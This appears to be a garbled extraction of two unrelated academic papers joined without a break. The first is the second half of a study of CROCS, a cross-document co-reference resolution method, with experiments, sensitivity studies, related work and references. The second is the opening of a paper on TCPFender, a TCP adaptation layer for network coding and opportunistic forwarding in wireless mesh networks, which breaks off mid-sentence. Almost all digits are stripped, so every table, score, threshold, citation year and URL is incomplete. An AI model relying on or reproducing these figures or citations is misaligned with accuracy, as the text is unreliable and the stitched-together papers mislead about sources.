phase) of such possibly singleton mention clusters from the “main data”, thereby helping in de-noising and efficiency. • sampling: instead of sampling data points uni- formly randomly, we use biased sampling sim- ilar to initialization used in k-means clustering. starting with a random point, we add points to the sample set such that their average similarity to the already included points is minimized, thus maximizing the diversity among the samples. stopping criterion of crocs: the sample-based hierarchical clustering process operates without any prior knowledge of the number of clusters (entities) present in the corpus. we use the bayesian infor- mation criteria (bic) (schwarz, ; hourdakis et al., ) as the stopping criterion to decide whether a cluster should be further split or finalized. bic is a bayesian variant of the minimum description length (mdl) principle (grunwald, ), assum- ing the points in a cluster to be gaussian distributed. the bic score of a cluster c with s (sampled) data points, xi and cluster centroid c̄ is: bic(c) = ∑ i= ,··· ,s log (xi − c̄) + log s the bic score for a set of clusters is the micro- averaged bic of the clusters. crocs splits a clus- ter c into sub-clusters c , . . . ,ck iff the combined bic value of the children is greater than that of the parent, else c is marked as leaf. experimental evaluation benchmark datasets: we performed experiments with the following three publicly available bench- marking datasets, thereby comparing the perfor- mance of crocs against state-of-the-art baselines under various input characteristics. • john smith corpus: the classical benchmark for ccr (bagga & baldwin, ) comprising articles selected from the new york times. it includes mentions of different “john smith” person entities. all mentions pertaining to john smith within a document refer to the same per- son. this provides a small-scale but demanding setting for ccr, as most john smiths are long- tail entities unknown to wikipedia or any kb. • weps- collection: a set of , web pages used in the web people search competition (artiles et al., ). the documents comprise the top web search results (using yahoo! search (as of )) for each of different people (obtained from wikipedia, acl’ , and us census), covering both prominent entities (e.g., ivan titov, computer science researcher) and long-tailed entities (e.g., ivan titov, actor). • new york times (nyt) archive: a set of around . million news article from the archives of the newspaper (sandhaus, ) extracted be- tween january and june . we ran- domly select , articles from the time range of january , through june , , which contain about . million mentions, or- ganized into . million local mention chains after the intra-document cr step. in our experiments, we consider mentions of person entities as this is the most predominant and demand- ing class of entities in the datasets. the john smith and weps- datasets have explicit ground truth an- notations, while the nyt contains editorial annota- tions for entities present in each article. for knowl- edge enrichment, we used freebase; although sensi- tivity studies explore alternative setups with yago. evaluation measures: we use the established mea- sures to assess output quality of ccr methods: • b f score (bagga & baldwin, ): mea- sures the f score as a harmonic mean of preci- sion and recall of the final equivalence classes. precision is defined as the ratio of the num- ber of correctly reported co-references (for each mention) to the total number; while recall com- putes the fraction of actual co-references cor- rectly identified. both the final precision and re- call are computed by averaging over all mention groups. • φ -ceaf score (luo, ): an alternate way of computing precision, recall, and f scores us- ing the best -to- mapping between the equiv- alence classes obtained and those in the ground truth. the best mapping of ground-truth to out- put classes exhibits the highest mention overlap. all experiments were conducted on a core intel i . ghz processor with gb ram running ubuntu . . . parameter tuning the use of external features extracted from kb’s (for mention groups) forms an integral part in the work- ing of crocs, and is represented by the choice of the threshold, θ. given an input corpus, we now dis- cuss the tuning of θ based on splitting the available data into training and testing subsets. we randomly partition the input data into parts (assumed to be labeled as a, b, and c). one of the data parts is the training data and the other two parts are the test data. using the gold annotations of the training dataset, we empirically learn the value of θ, that provides the best b f score for ccr, using a simple line search. initially, θ is set to (no kb usage) and is subsequently decreased using . method p (%) r (%) f (%) crocs . . . stream (rao, ) . . . inference (singh, ) - - . table : b f results on john smith dataset. as the step size for each of the learning phase itera- tions. as soon as the performance of crocs is seen to degrade (compared to the previous iteration), the procedure is terminated and the previous value of θ is considered as the learned parameter value. the final results we report are averaged over indepen- dent runs, each considering different data partitions (among a, b, and c) as the training data. although more advanced learning algorithms might also be used, this simple approach is observed to work well. learning of the θ value might converge to a local maximum, or may be distorted due to presence of noise in the training data. however, we later show (in section . ) that the performance of crocs is robust to small variations of θ. . john-smith corpus: long-tail entities table compares crocs with two state-of-the- art methods achieving the best published results for this benchmark. randomly selected documents were used as the training set (while the rest formed the test set) and the subsequent θ value learned (as described in section . ) was . . since the corpus contained mostly long-tail entities not present in any kb (only - of the different john smith’s are in wikipedia, eg. the explorer john smith etc.), the kb matches were too unreliable and led to the introduc- tion of noise. hence, a high value of θ was obtained (i.e. kb features mostly disregarded). crocs (using sample-based spectral cluster- ing) achieves an f score of . %, while stream (rao et al., ) and inference (singh et al., ) reach only . % and . % resp. crocs also has a high φ -ceaf score of . % exhibiting substantial gains over prior methods . our novel notion of semsum’s with extended scope (mentions and co-occurring mention groups) proved essential for outperforming the existing methods (see sec- tion . ). the runtime of crocs was only around seconds. data and detailed crocs output results are available at (www.dropbox.com/s/ grribug yghys/john_smith_ dataset.zip?dl= ) method p (%) r (%) f (%) crocs . . . polyuhk (artiles, ) uva (artiles, ) table : b f results on weps- dataset. . weps- corpus: web contents we compared sampled spectral clustering based crocs on the weps- corpus against the best methods reported in (artiles et al., ). we em- pirically obtained the kb match parameter θ = . according to the train-test setup described earlier (with training documents). crocs achieves a b based f score of . % and a φ -ceaf score of . % (table ), providing an improvement of about . f score points . the gain observed is not as high as that for the john smith dataset, as in the weps- corpus doc- uments are longer, giving richer context with fewer ambiguous entity mentions. thus, simpler methods also perform fairly well. the runtime of crocs on weps- corpus was about seconds. . new york times corpus: web scale the previous two datasets, john smith and weps- are too small to assess the robustness of crocs for handling large data. we therefore ran crocs (with sample-based spectral clustering) on a random sample of , nyt news articles. the knowl- edge enrichment threshold θ was learned to be . with k training documents. crocs achieved a b f score of . % (with p = . % and r = . %) and a φ - ceaf score of . %. no prior methods report f performance figures for this large dataset. how- ever, the factor graph based approach of (singh et al., ) measures the mention co-reference ac- curacy for a sample of , documents. accu- racy is defined as the ratio of document clusters as- signed to an entity to the ground truth annotations. we also sampled , documents considering only mentions with multiple entity candidates. crocs achieved an accuracy of . %, as compared to . % for (singh et al., ). as for run-time, crocs took . hours to pro- cess around , news articles selected as the test corpus. we also compared this result against al- data and detailed crocs output results are avail- able at (www.dropbox.com/s/ i ot seavcfdyc/weps- _ dataset.zip?dl= ) crocs configuration weps- nyt sentences only . . basic scope . . extended scope . . ned baseline . . table : b f scores for crocs enrichment variants. ternative algorithms within our framework (see sec- tion . ). hence, crocs efficiently handles web scale input data. . sensitivity studies the crocs framework involves a number of tun- able hyper-parameters adjusting the precise perfor- mance of the components. we now study the robust- ness of crocs (sample-based spectral clustering variant) for varying parameter values. knowledge enrichment scope: crocs supports several levels of knowledge en- richment for semsum’s construction: i) including only sentences of a mention group (disregarding the kb), ii) using distant kb labels for the given mention group only (basic scope), and iii) adding distant kb labels for co-occurring mention groups (extended scope). we compared these configura- tions among each other and also against a state- of-the-art ned method alone. the results are shown in table . we used aida (hoffart et al., ) open-source software (https://github. com/yago-naga/aida) for ned, and combined mentions mapped to the same kb entity. we use the trained value of θ obtained previously (for the re- spective datasets) for constructing the basic and ex- tended scope of semsum’s, and report the best b f scores. note that the sentences only and ned con- figurations are independent of the choice of θ value. real-life web articles contain a mixture of promi- nent entities, ambiguous names, and long-tail en- tities; hence sole reliance on ned for ccr fares poorly. the extended scope semsum’s construction produces superior results compared to other models. knowledge enrichment matching threshold: to study the influence of different degrees of dis- tant kb feature extraction, we varied the enrich- ment matching threshold θ from . (accept all kb matches) to . (no import from kb). the john smith dataset largely containing long-tail entities uses θ ∼ (trained value), and operates on sem- sum’s containing practically no feature inclusion from external kb’s. hence, we only consider the scenario when the kb is completely disregarded (i.e. dataset θ . . . . . . . weps- . . . . . . . nyt . . . . . . . table : b f scores (%) for different choices of θ. dataset θ used p(%) r(%) f (%) weps- . . . . nyt . . . . table : θ error sensitivity of crocs θ = . ) and obtain a b f score of . %. for the other two datasets, the b f results for varying θ are shown in table . we observe that kb features help the ccr process and the best results are obtained for θ between . and . . we observe that the exact choice of θ is not a sensitive issue, and any choice between . and . yields fairly good f scores (within % of the empirically optimal f results). hence, our approach is robust regarding pa- rameter tuning. we observe that the trained value of θ (obtained previously) for both the weps- and the nyt datasets are close to the optimal setting as seen from table and provide nearly similar f score perfor- mance. therefore, we set θ = . and consider the entire input corpora as test set for the remainder of our experiments. to reconfirm the robustness of crocs to θ value ranges, we use the kb threshold trained on weps- dataset, and test it on the nyt dataset (and vice versa). from table we observe crocs to render comparable performance in presence of er- rors during the θ learning phase. clustering hyper-parameters: we study the effect of varying k, the number of sub- clusters for the bisection procedure invoked at each level of the hierarchical clustering. by default, this is set to (i.e. bisection). table shows the b f scores for different choices of k, for the three datasets (with θ = . for john smith and θ = . for the other two datasets). we observe that k = performs best in all cases. the output quality mono- tonically drops with increase in k, as this forces even similar mention groups to form separate clusters. hence, bisection allows the hierarchical process to adjust the model selection at the global level. alternative kb: to assess the impact of dependency on freebase (feature extraction of best matching entity), we dataset k= k= k= k= john smith . . . . weps- . . . . nyt . . . . table : b f scores (%) for different # sub-clusters k. dataset freebase yago p(%) r(%) f p(%) r(%) f weps- . . . . . . nyt . . . . . . table : crocs b f scores with freebase vs. yago ran alternative experiments on the weps- and nyt datasets with the yago kb (www.yago- knowledge.org). we obtain all approximate matches for a mention group and rank them based on the keyphrase similarity model (section ) us- ing sentences of the mention group and extracted features (from the yago haslabel property and in- foboxes in wikipedia pages of the sameas link). results in table show similar performance, depict- ing no preference of crocs to any particular kb. . algorithmic variants the crocs framework supports a variety of al- gorithmic building blocks, most notably, clustering methods (eg., k-means) or graph partitioning for the bisection steps, and most importantly, sampling- based methods versus methods that fully process all data points. the comparative results for the three different datasets are presented in table . for the john smith corpus (with θ = . ), all algorithms except sample-based k-means achieved similar performances in accuracy and runtime. the best method was the full-fledged spectral clustering, with about % f score improvement. with the weps- dataset, we obtain a similar pic- ture w.r.t. output quality. however, this dataset is large enough to bring out the run-time differences. sampling-based methods, including crocs, were about × faster than their full-fledged counterparts, albeit with a meager loss of about % in f score. the nyt dataset finally portrays the scenario on huge datasets. here, only the sample-based methods ran to completion, while all the full-fledged methods were terminated after hours. the fastest of them, the simple k-means method, had processed only about % of the data at this point (needing about hours on extrapolation). in contrast, crocs, using sample-based spectral clustering or graph par- titioning, needed about . hours for the , documents. the sampling-based k-means competi- tor was slightly faster ( . hours), but lost dramat- ically on output quality: with only about % f score compared to % f score for crocs. hence, we observe that crocs is indeed well designed for scalable sampling-based ccr, whereas other simpler methods like k-means, lacking transi- tivity awareness, fail to deliver good output quality. related work co-reference resolution (cr): existing intra- document cr methods combine syntactic with se- mantic features for identifying the best antecedent (preceding name or phrase) for a given mention (name, phrase, or pronoun). syntactic features are usually derived from deep parsing of sentences and noun group parsing. semantic features are obtained by mapping mentions to background knowledge re- sources such as wikipedia. an overview of cr methods is given in (ng, ). recent methods adopt the paradigm of multi-phase sieves, apply- ing a cascade of rules to narrow down the choice of antecedents for a mention (e.g., (haghighi & klein, ; raghunathan et al., ; ratinov & roth, )). the cluster-ranking family of methods (e.g., (rahman & ng, b)) extends this paradigm for connecting mentions with a cluster of preceding mentions. person name disambiguation in cr deals with only person names, title, nicknames, and sur- face forms variations (chen & martin, ). distant knowledge labels for cr: to obtain semantic features, additional knowledge resources such as wikipedia, yago ontology, and framenet corpus have been considered (suchanek et al., ; rahman & ng, a; baker, ). to identify the entity candidate(s) that a mention (group) should use for distant supervision, cr methods such as (rati- nov & roth, ; lee et al., ) use matching heuristics based on the given mention alone to iden- tify a single entity or all matching entities with con- fidence above some threshold. zheng et al. ( ) generalizes this by maintaining a ranked list of en- tities for distant labeling, as mention groups are up- dated. unlike crocs, prior methods utilize only the candidates for the given mention (group) it- self and distant knowledge features for co-occurring mentions are not considered. cross-document cr (ccr): early works (gooi & allan, ) on ccr, introduced by (bagga & dataset clustering method b measure φ measure (%) run-timep (%) r (%) f (%) spectral clustering . . . . . sec k-means clustering . . . . . sec john balanced graph partition . . . . . sec smith sampled k-means . . . . . sec sampled spectral clustering . . . . . sec sampled graph partitioning . . . . . sec weps- spectral clustering . . . . sec k-means clustering . . . . . sec balanced graph partition . . . . . sec sampled k-means . . . . sec sampled spectral clustering . . . . . sec sampled graph partitioning . . . . . sec k-means clustering* . * . * . * . * > hrs new york sampled k-means . . . . . hrs times sampled spectral clustering . . . . . hrs sampled graph partitioning . . . . . hrs * results after run terminated at hrs (∼ % mentions processed) table : accuracy and scalability of various algorithms embedded in crocs baldwin, ), used ir-style similarity measures (tf×idf cosine, kl divergence, etc.) on features, similar to intra-document cr. recent works such as (culotta et al., ; singh et al., ; singh et al., ) are based on probabilistic graphical models for jointly learning the mappings of all mentions into equivalence classes. the features for this learning task are essentially like the ones in local cr. baron and freedman ( ) proposed a ccr method in- volving full clustering coupled with statistical learn- ing of parameters. however, this method does not scale to large corpora making it unsuitable for web contents. a more light-weight online method by (rao et al., ) performs well on large bench- mark corpora. it is based on a streaming cluster- ing algorithm, which incrementally adds mentions to clusters or merges mention groups into single clus- ters, and has linear time complexity; albeit with infe- rior clustering quality compared to advanced meth- ods like spectral clustering. several ccr methods have harnessed co-occurring entity mentions, espe- cially for the task of disambiguating person names (mann & yarowsky, ; niu et al., ; chen & martin, ; baron & freedman, ). how- ever, these methods do not utilize knowledge bases, but use information extraction (ie) methods on the input corpus itself; thus facing substantial noise due to ie quality variance on stylistically diverse docu- ments like web articles. spectral clustering: (luxburg, ) provides a detailed study on spectral clustering models and al- gorithms. yan et al. ( ) proposed two approxi- mation algorithms, based on the k-means technique and random projections, reducing the o(n ) time complexity to o(k ) + o(kn) where k is the num- ber of clusters. in ccr, the number of clusters (truly distinct entities) can be huge and typically unknown; hence (shamir & tishby, ; krishnamurty et al., ; wauthier et al., ) developed active spectral clustering, where the expensive clustering step is based on data samples and other data points are merely “folded in”. the term “active” refers to the active learning flavor of choosing the samples (notwithstanding that these methods mostly adopt uniform random sampling). conclusions we have presented the crocs framework for cross-document co-reference resolution (ccr). it performs sample-based spectral clustering or graph partitioning in a hierarchical bisection process to ob- tain the mention equivalence classes, thereby avoid- ing model-selection parameters and the high cost of clustering or partitioning. crocs constructs features for mention groups by considering co- occurring mentions and obtaining distant semantic labels from kb’s (for semsum’s). feature generation from multiple kb’s and cater- ing to streaming scenarios (e.g., news feeds or social media) are directions of future work. references j. artiles, j. gonzalo, s. sekine: . weps evalua- tion campaign: overview of the web people search clustering task. www . a. bagga, b. baldwin: . entity-based cross- document coreferencing using the vector space model. in coling-acl, pages – . c. f. baker: . framenet, current collaborations & future goals. lrec, ( ): – . a. baron, m. freedman: . who is who & what is what: experiments in cross-document co- reference. in emnlp, pages – . a. buluc, h. meyerhenke, i. safro, p. sanders, c. schulz: . recent advances in graph partitioning. karl- sruhe institute of technology, technical report. j. cai, m. strube: . evaluation metrics for end- to-end coreference resolution systems. in sigdial, pages – . y. chen, j. martin: . towards robust unsupervised personal name disambiguation. in emnlp-conll, pages – . m. cornolti, p. ferragina, m. ciaramita: . a frame- work for benchmarking entity-annotation systems. in www, pages – . s. cucerzan: . large-scale named entity dis- ambiguation based on wikipedia data. in emnlp- conll, pages – . a. culotta, m. l. wick, a. mccallum: . first-order probabilistic models for coreference resolution. in hlt-naacl, pages – . p. domingos, s. kok, d. lowd, h. poon, m. richard- son, p. singla: . markov logic. probabilistic ilp. springer-verlag, pages – . p. domingos, d. lowd: . markov logic: an in- terface layer for artificial intelligence. morgan and claypool publishers, . j. r. finkel, t. grenager, c. d. manning: . incor- porating non-local information into information ex- traction systems by gibbs sampling. in acl, pages – . c. h. gooi, j. allan: . cross-document coreference on a large scale corpus. in hlt-naacl, pages – . p. d. grünwald: . the minimum description length principle. mit university press. a. haghighi, d. klein: . simple coreference reso- lution with rich syntactic and semantic features. in emnlp, pages – . a. haghighi, d. klein: . coreference resolution in a modular, entity-centered model. in hlt-naacl, pages – . h. hajishirzi, l. zilles, d. s. weld, l. s. zettlemoyer: . joint coreference resolution and named-entity linking with multi-pass sieves. in emnlp, pages – . j. hoffart, m. a. yosef, i. bordino, h. fürstenau, m. pinkal, m. spaniol, b. taneva, s. thater, g. weikum: . robust disambiguation of named entities in text. in emnlp, pages – . n. hourdakis, m. argyriou, g. m. petrakis, e. e. mil- ios: . hierarchical clustering in medical docu- ment collections: the bic-means method. journal of digital information management, ( ): – . g. karypis, v. kumar: . a fast and highly quality multilevel scheme for partitioning irregular graphs. journal on scientific computing, ( ): – . b. w. kernighan, s. lin: . an efficient heuristic pro- cedure for partitioning graphs. bell system technical journal. d. koller, n. friedman: . probabilistic graphical models: principles and techniques. mit press. a. krishnamurty, s. balakrishnan, m. xu, a. singh: . efficient active algorithms for hierarchical clustering. in icml, pages – . h. lee, y. peirsman, a. chang, n. chambers, m. sur- deanu, d. jurafsky: . stanford’s multi-pass sieve coreference resolution system at the conll- shared task. in conll, pages – . h. lee, a. chang, y. peirsman, n. chambers, m. sur- deanu, d. jurafsky: . deterministic coreference resolution based on entity-centric, precision-ranked rules. computational linguistics journal, ( ): – . h. lee, m. recasens, a. x. chang, m. surdeanu, d. ju- rafsky: . joint entity and event coreference res- olution across documents. in emnlp-conll, pages – . h. a. loeliger: . an introduction to factor graphs. in mlsb. x. luo: . on coreference resolution performance metrics. in hlt-emnlp, pages – . u. von luxburg: . a tutorial on spectral clustering. statistics and computing journal, ( ): – . g. s. mann, d. yarowsky: . unsupervised personal name disambiguation. in conll,hlt-naacl, pages – . d. n. milne, i. h. witten: . learning to link with wikipedia. in cikm, pages – . v. ng: . supervised noun phrase coreference re- search: the first fifteen years. in acl, pages – . c. niu, w. li, r. k. srihari: . weakly super- vised learning for cross-document person name dis- ambiguation supported by information extraction. in acl, article . k. raghunathan, h. lee, s. rangarajan, n. chambers, m. surdeanu, d. jurafsky, c. manning: . a multi- pass sieve for coreference resolution. in emnlp, pages – . a. rahman, v. ng: a. coreference resolution with world knowledge. in acl, pages – . a. rahman, v. ng: b. ensemble-based coreference resolution. in ijcai, pages – . d. rao, p. mcnamee, m. dredze: . streaming cross document entity coreference resolution. in col- ing, pages – . l. a. ratinov, d. roth, d. downey, m. anderson: . local and global algorithms for disambiguation to wikipedia. in acl, pages – . l. a. ratinov, d. roth: . learning-based multi- sieve co-reference resolution with knowledge. in emnlp-conll, pages – . m. richardson, p. domingos: . markov logic net- works. journal of machine learning, ( - ): – . e. sandhaus: . the new york times annotated cor- pus overview. linguistic data consortium. g. e. schwarz: . estimating the dimension of a model. annals of statistics, ( ): – . o. shamir, n. tishby: . spectral clustering on a budget. journal of machine learning research - pro- ceedings track : – . s. singh, m. l. wick, a. mccallum: . distantly la- beling data for large scale cross-document corefer- ence. corr abs/ . . s. singh, a. subramanya, f. pereira, a. mccallum: . large-scale cross-document coreference us- ing distributed inference and hierarchical models. in acl, pages – . f. m. suchanek, g. kasneci, g. weikum: . yago: a core of semantic knowledge. in www, pages – . b. taneva, m. kacimi, g. weikum: . finding im- ages of difficult entities in the long tail. in cikm, pages – . f. l. wauthier, n. jojic, m. i. jordan: . active spec- tral clustering via iterative uncertainty reduction. in kdd, pages – . d. yan, l. huang, m. i. jordan: . fast approximate spectral clustering. in kdd, pages – . j. zheng, l. vilnis, s. singh, j. d. choi, a. mccal- lum: . dynamic knowledge-base alignment for coreference resolution. in conll, pages – . submitted may accepted september published october corresponding author chen zhang, cz @mun.ca academic editor baochun li additional information and declarations can be found on page doi . /peerj-cs. copyright zhang et al. distributed under creative commons cc-by . open access tcp adaptation with network coding and opportunistic data forwarding in multi-hop wireless networks chen zhang , yuanzhu chen and cheng li department of computer science, memorial university of newfoundland, st. john’s, canada department of electrical and computer engineering, memorial university of newfoundland, st. john’s, canada abstract opportunistic data forwarding significantly increases the throughput in multi-hop wireless mesh networks by utilizing the broadcast nature of wireless transmissions and the fluctuation of link qualities. network coding strengthens the robustness of data transmissions over unreliable wireless links. however, opportunistic data forwarding and network coding are rarely incorporated with tcp because the frequent occurrences of out-of-order packets in opportunistic data forwarding and long decoding delay in network coding overthrow tcp’s congestion control. in this paper, we propose a solution dubbed tcpfender, which supports opportunistic data forwarding and network coding in tcp. our solution adds an adaptation layer to mask the packet loss caused by wireless link errors and provides early positive feedbacks to trigger a larger congestion window for tcp. this adaptation layer functions over the network layer and reduces the delay of acks for each coded packet. the simulation results show that tcpfender significantly outperforms tcp/ip in terms of the network throughput in different topologies of wireless networks. subjects computer networks and communications, network science and online social networks keywords tcp, network coding, opportunistic data forwarding, multi-hop wireless networks introduction wireless mesh networks have emerged as the most common technology for the last mile of internet access. the internet provides a platform for rapid and timely information exchanges among clients and servers. transmission control protocol (tcp) has become the most prominent transport protocol on the internet. since tcp was originally designed primarily for wired networks that have low bit error rates, moderate packet loss, and packet collisions, the performance of tcp degrades to a greater extent in multi-hop wireless networks, where several unreliable wireless links may be involved in data transmissions (aguayo et al., ; jain & das, ). however, multi-hop wireless networks have several advantages, including rapid deployment with less infrastructure and less transmission power over multiple short links. moreover, a high data rate can be achieved by novel cooperation or high link utilization (larsson, ). some important issues are being addressed by researchers to utilize these capabilities and increase tcp performance in multi-hop wireless networks, such as efficiently searching the ideal path how to cite this article zhang et al. ( ), tcp adaptation with network coding and opportunistic data forwarding in multi-hop wire- less networks. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:cz @mun.ca https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. from a source to a destination, maintaining reliable wireless links, protecting nodes from network attacks, reducing energy consumption, and supporting different applications. in multi-hop wireless networks, data packet collision and link quality variation can cause packet losses. tcp often incorrectly assumes that there is congestion, and therefore reduces the sending rate. however, tcp is actually required to transmit continuously to overcome these packets losses. as a result, such a problem causes poor performance in multi-hop wireless networks. there are extensive studies working on these harmful effects. some studies were proposed to reduce the collision between tcp data packets and tcp acknowledgements or dynamically adjust the congestion window. other relief may come from network coding. the pioneering paper proposed by ahlswede et al. ( ) presents the fundamental theory of network coding. instead of forwarding a single packet at each time, network coding allows nodes to recombine input packets into one or several output packets. furthermore, network coding is also very well suited for environments where only partial or uncertain data is available for making a decision (mehta & narmawala, ). the link quality variation in multi-hop wireless networks is widely studied in the opportunistic data forwarding under user datagram protocol (udp). it was traditionally treated as an adversarial factor in wireless networks, where its effect must be masked from upper-layer protocols by automatic retransmissions or strong forwarding error corrections. however, recent innovative studies utilize the characteristic explicitly to achieve opportunistic data forwarding (biswas & morris, ; chen, zhang & marsic, ; wang, chen & li, ). unlike traditional routing protocols, the forwarder in opportunistic routing protocols broadcasts the data packets before the selection of next- hop forwarder. opportunistic routing protocols allow multiple downstream nodes as candidates to forward data packets instead of using a dedicated next-hop forwarder. since the broadcasting nature of wireless links naturally supports both network coding and opportunistic data forwarding, many studies work on improving udp performance in multi-hop wireless networks by opportunistic data forwarding and network coding. however, opportunistic data forwarding and network coding are inherently unsuitable for tcp. the frequent dropping of packets or out-of-order arrivals overthrow tcp’s congestion control. specifically, opportunistic data forwarding does not attempt to forward packets in the same order as they are injected in the network, so the arrival of packets will be in a different order. network coding also introduces long coding delays by both the encoding and the decoding processes; besides, it is possible along with some scenarios of not being able to decode packets. these phenomena introduce duplicated ack segments and frequent timeouts in tcp transmissions, which reduce the tcp throughput significantly. our proposed protocol, called tcpfender, uses opportunistic data forwarding and network coding to improve tcp throughputs. tcpfender adds an adaptation layer above the network layer to cooperate with tcp’s control feedback loop; it makes the tcp’s congestion control work well with opportunistic data forwarding and network coding. tcpfender proposes a novel feedback-based scheme to detect the network congestion and distinguish duplicated acks caused by out-of-order arrivals in opportunistic data forwarding from those caused by network congestion. we compared the throughput of tcpfender and tcp/ip in different topologies of wireless mesh networks, and analyzed the zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. influence of batch sizes on the tcp throughput and the end-to-end delay. since our work adapts the tcpfender to functioning over the network layer without any modification to tcp itself, it is easy to deploy in wireless mesh networks. related work opportunistic data forwarding exor (extreme opportunistic routing) is a seminal effort in opportunistic routing protocols (biswas & morris, ). it is an integrated routing and mac protocol that exploits the broadcast nature of wireless media. in a wireless mesh network, when a source transmits a data packet to a destination by several intermediate nodes which are decided by the routing module, other downstream nodes not in the routing path, can overhear the transmission. if the dedicated intermediate node, which is in the routing path, fails to receive this packet, other nearby downstream nodes can be scheduled to forward this packet instead of the sender retransmitting. in this case, the total transmission energy consumption and the transmission delay can be reduced, and the network throughput will be increased. unfortunately, traditional ip forwarding dictates that all nodes without a matching receiver address should drop the packet, and only the node that the routing module selects to be the next hop can keep it for forwarding subsequently, so traditional ip forwarding is easily affected by link quality variation. however, exor allows multiple downstream nodes to coordinate and forward packets. the intermediate nodes, which are ‘closer’ to the destination, have a higher priority in forwarding packets towards the destination. exor can utilize the transient high quality of links and obtains an opportunistic forwarding gain by taking advantage of transmissions that reach unexpectedly far or fall unexpectedly short. in exor, a forwarding schedule is proposed to reduce duplicate transmissions. this schedule guarantees that only the highest priority receiver will forward packets to downstream nodes. however, this ‘strict’ schedule also reduces the possibilities for spatial reuse. the study in (chachulski et al., ) shows that exor can have better spatial reuse of wireless media. furthermore, this schedule may be violated due to frequent packet loss and packet collision. opportunistic data forwarding with network coding studies show that network coding can reduce the data packet collision and approach the maximum theoretical capacity of networks (ahlswede et al., ; li, yeung & cai, ; koetter & médard, ; laneman, tse & wornell, ; jaggi et al., ; ho et al., ). many researchers incorporate network coding in opportunistic data forwarding to improve the throughput performance (chachulski et al., ; lin, li & liang, ; lin, liang & li, ; zhu et al., ). more (mac-independent opportunistic routing and encoding) is practical opportunistic routing protocol based on random linear network coding (chachulski et al., ). in more, the source node divides data packets from the upper layer into batches and generates coded packets of each batch. similar to exor, packets in more are also forwarded based on a batch. packets with the same batch index can be encoded together. the destination node can decode these coded packets to original packets after receiving enough independently coded packets in the same batch. zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the destination receives enough packets when the decoding matrix reaches the full rank, then these original packets will be pushed to the upper layer. more coordinates the forwarding of each node using a transmission credit system, which is calculated based on how effective it would be in forwarding coded data packets to downstream nodes. this transmission credit system reduces the possibility that intermediate nodes forward the same packets in duplication. however, more uses a ‘stop-and-wait’ design with a single batch in transmission, which is not efficient utilizing the bandwidth of networks. cope focuses on inter-session network coding; it is a framework to combine and encode data flows through joint nodes to achieve a high throughput (basagni et al., ). caor (coding aware opportunistic routing) proposes a localized coding-aware opportunistic routing mechanism to increase the throughput of wireless mesh networks. in this protocol, the packet carries out with the awareness of coding opportunities and no synchronization is required among nodes (yan et al., ). nc-mac improves the efficiency of coding decisions by verifying the decodability of packets before they are transmitted (argyriou, ). the scheme focuses on ensuring correct coding decisions at each network node, and it requires no cross-layer interactions. codeor (coding in opportunistic routing) improves more in a few important ways (lin, li & liang, ). in more, the source simply keeps transmitting coded packets belonging to the same batch until the acknowledgment of this batch from the destination has been received. codeor allows the source to transmit multiple batches of packets in a pipeline fashion. they also proposed a mathematical analysis in tractable network models to show the way of ‘stop-and-wait’ affects the network throughput, especially in large or long topology. the timely acks are transmitted from downstream nodes to reduce the penalty of inaccurate timing in transmitting the next batch. codeor applies the ideas of tcp flow control to estimate the correct sending window and the flow control algorithm is similar to tcp vegas, which uses increased queueing delay as congestion signals. slideor works with online network coding (lin, liang & li, ), in which data packets are not required to be divided into multiple batches or to be encoded separately in each batch. in slideor, the source node encodes packets in overlapping sliding windows such that coded packets from one window position may be useful towards decoding the packets inside another window position. once a coded packet is ‘seen’ by the destination node, the source node only encodes packets after this seen packet. since it does not need to encode any packet that is already seen at the destination, slideor can transmit useful coded packets and achieve a high throughput. ccack (cumulative coded acknowledgment) allows nodes to acknowledge coded packets to upstream nodes with negligible overhead (koutsonikolas, wang & hu, ). it utilizes a null space-based (nsb) coded feedback vector to represent the entire decoding matrix. codepipe is a reliable multicast protocol, which improves the multicast throughput by exploiting both intra and inter network coding (li et al., ). core (coding-aware opportunistic routing mechanism) combines inter-session and intra-session network coding (krigslund et al., ). it allows nodes in the network to setup inter-session coding regions where packets from different flows can be xored. packets from the same flow uses random linear network coding for intra-session coding. core provides a solution to cope zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. with the unreliable overhearing and improves the throughput performance in multi-hop wireless networks. ncor focuses on how to select the best candidate forwarder set and allocate traffic among candidate forwarders to approach optimal routing (cai et al., ). it contracts a relationship tree to describe the child-parent relations along the path from the source to the destination. the cost of the path is the sum of the costs of each constituent hyperlink for delivering one unit of information to the destination. the nodes, which create the path with the minimum cost, can be chosen as candidate forwarders. hsu et al. ( ) proposed a stochastic dynamic framework to minimize a long-run average cost. they also analyzed the problem of whether to delay packet transmission in hopes that a coding pair will be available in the future or transmit a packet without coding. garrido et al. ( ) proposed a cross-layer technique to balance the load between relaying nodes based on bandwidth of wireless links, and they used an intra-flow network coding solution modelled by means of hidden markov processes. however, the schemes above were designed to utilize opportunistic data forwarding and network coding, but none of these was designed to support tcp. network coding in tcp a number of recent papers have utilized network coding to improve tcp throughput. in particular, (huang et al., ) introduce network coding to tcp traffic, where data segments in one direction and ack segments in the opposite direction can be coded at intermediate nodes. the simulation showed that making a small delay at each intermediate node can increase the coding opportunity and increase the tcp throughput. tcp/nc enables a tcp-compatible sliding-window approach to utilize network coding (sundararajan et al., ). such a variant of tcp is based on ack-based sliding-window network coding approach and improves the tcp throughput in lossy links. it uses the degree of freedom in the decoding matrix instead of the number of received original packets as the sequence number in ack. if a received packet increases the degree of freedom in the decoding matrix, this packet is called an innovative packet and this packet is ‘seen’ by the destination. the destination node will generate an acknowledgment whenever a coded packet is seen instead of producing an original packet. however, tcp/nc cannot efficiently control the waiting time for the decoding matrix to become full rank, and the packet loss can make tcp/nc’s decoding matrix very large, which causes a long packet delay (sun et al., ). tcp-von introduces online network coding (onc) to tcp/nc, which can smoothly increase the receiving data rate and packets can be decoded quickly by the destination node. however, these protocols are variants of rtt-based congestion control tcp protocols (e.g., vegas), which limits their applications in practice since most tcp protocols are loss-based congestion control (bao et al., ). tcp-fnc proposes two algorithms to increase the tcp 